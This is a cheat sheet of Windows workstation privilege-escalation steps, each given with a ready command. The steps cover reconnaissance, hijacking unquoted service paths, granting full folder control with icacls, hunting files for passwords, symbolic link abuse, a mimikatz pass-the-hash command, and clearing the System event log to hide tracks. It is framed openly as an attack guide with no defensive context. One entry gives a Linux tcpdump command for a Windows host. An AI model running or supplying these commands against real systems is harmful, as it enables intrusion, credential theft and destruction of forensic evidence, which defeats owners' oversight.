Detailed Steps for Workstation Privilege Escalation Local Reconnaissance: Gather system information to identify potential escalation vectors. (Command: systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" - Provides details about the operating system and system architecture.) Service Exploits: Check for vulnerable services. (Command: sc query | findstr /i "SERVICE_NAME" - Lists all services and their states to identify potential misconfigurations or vulnerable software.) Scheduled Tasks: Review scheduled tasks for potential misuse. (Command: schtasks /query /fo LIST /v - Displays detailed information about scheduled tasks that could be exploited.) Unquoted Service Paths: Exploit unquoted service paths to gain elevated privileges. (Command: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\" | findstr /i /v """ - Finds services with unquoted paths that could be hijacked.) Weak Permissions: Exploit weak folder permissions to replace executables or configuration files. (Command: icacls "C:\Program Files\Some Software" /grant "username:(F)" - Modifies permissions to allow full control over a directory.) Vulnerable Applications: Identify and exploit vulnerable installed applications. (Command: wmic product get name,version - Lists installed software for manual checking against vulnerability databases.) Driver Exploits: Check for outdated or vulnerable drivers. (Command: driverquery - Displays all installed device drivers and their properties.) Network Sniffing: Monitor network traffic for credentials or sensitive data. (Command: tcpdump -i eth0 -w capture.pcap - Captures packets on the network interface for later analysis.) Clear Logs: Clear event logs to hide tracks. (Command: wevtutil cl System - Clears the system log to cover forensic tracks.) Pass the Hash: Utilize stolen hashes for authentication bypass. (Command: mimikatz "sekurlsa::pth /user:admin /domain:domain.com /ntlm:HASH /run:cmd.exe" - Opens a new command prompt with elevated privileges using the NTLM hash.) Exploit Common Vulnerabilities: Search for and exploit known vulnerabilities in installed software. (Command: searchsploit [software] - Uses Exploit-DB to find exploits for known vulnerabilities.) Registry Permissions: Check for misconfigured registry permissions. (Command: reg query HKLM /f "sethc.exe" /t REG_SZ /s - Checks for potential sticky keys override points in the registry.) Startup Items: Examine startup items for persistence and privilege escalation opportunities. (Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run - Lists programs that run on startup.) Path Interception: Identify writable directories in the system PATH for DLL hijacking. (Command: echo %PATH% and icacls to check permissions.) Symbolic Link Abuse: Use symbolic links to redirect access to controlled resources. (Command: mklink /D link target - Creates a symbolic link to redirect operations from an intended target to an attacker-controlled target.) Credentials in Files: Search file systems for stored credentials. (Command: findstr /si password *.txt *.ini *.config - Searches for the string "password" across common text-based config files.) Secrets Management: Check for improper secrets management solutions. (Command: dir /s *secrets*.xml *creds*.txt - Searches for files that might store sensitive information.) Outdated Components: Identify and exploit outdated components and libraries. (Command: sigcheck -u -e C:\path\to\directory - Checks for unsigned and older versions of files in a directory.) Logon Scripts: Investigate logon scripts for exploitation opportunities. (Command: type %LOGONSERVER%\netlogon\logon.bat - Displays the contents of a common logon script.) Service Configurations: Examine service configurations for weaknesses. (Command: sc qc servicename - Queries the configuration of a specified service to identify potential misconfigurations or vulnerabilities.)